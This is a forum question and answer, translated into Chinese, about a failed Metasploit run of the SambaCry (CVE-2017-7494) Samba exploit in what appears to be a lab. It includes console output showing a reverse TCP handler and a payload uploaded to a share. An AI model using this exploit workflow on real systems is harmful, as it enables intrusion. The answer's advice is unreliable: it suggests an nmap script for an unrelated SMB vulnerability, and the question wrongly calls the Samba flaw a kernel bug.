无法使用metasploit利用samba cry的有效性

Question

我正在尝试利用linux内核漏洞samba CVE (CVE-2017-7494)进行一些使用metasploit框架的研究工作。但是我得到以下错误: msf exploit(is_known_pipename) > run

[*] Started reverse TCP handler on 192.168.78.136:4444 
[*] 192.168.78.139:445 - Using location \\192.168.78.139\myshare\ for the 
path#
[*] 192.168.78.139:445 - Retrieving the remote path of the share 'myshare'
[*] 192.168.78.139:445 - Share 'myshare' has server-side path '/shared
[*] 192.168.78.139:445 - Uploaded payload to 
\\192.168.78.139\myshare\BsdRHcSh.so
[*] 192.168.78.139:445 - Loading the payload from server-side path 
/shared/BsdRHcSh.so using \\PIPE\/shared/BsdRHcSh.so...
[-] 192.168.78.139:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.78.139:445 - Loading the payload from server-side path  
/shared/BsdRHcSh.so using /shared/BsdRHcSh.so...
[-] 192.168.78.139:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Exploit completed, but no session was created.

是因为我的目标主机不可验证还是其他问题？我的目标主机是samba版本- 3.6.23，据我所知它是有效的。

谢谢

Answer 1

加载STATUS_OBJECT_NAME_NOT_FOUND失败意味着“找不到对象名称”。可能metasploit无法上载共享文件夹中的负载。您是否可以尝试执行nmap并验证该漏洞的存在？该命令为nmap -p445 --script smb-vuln-ms17-010 TARGET_IP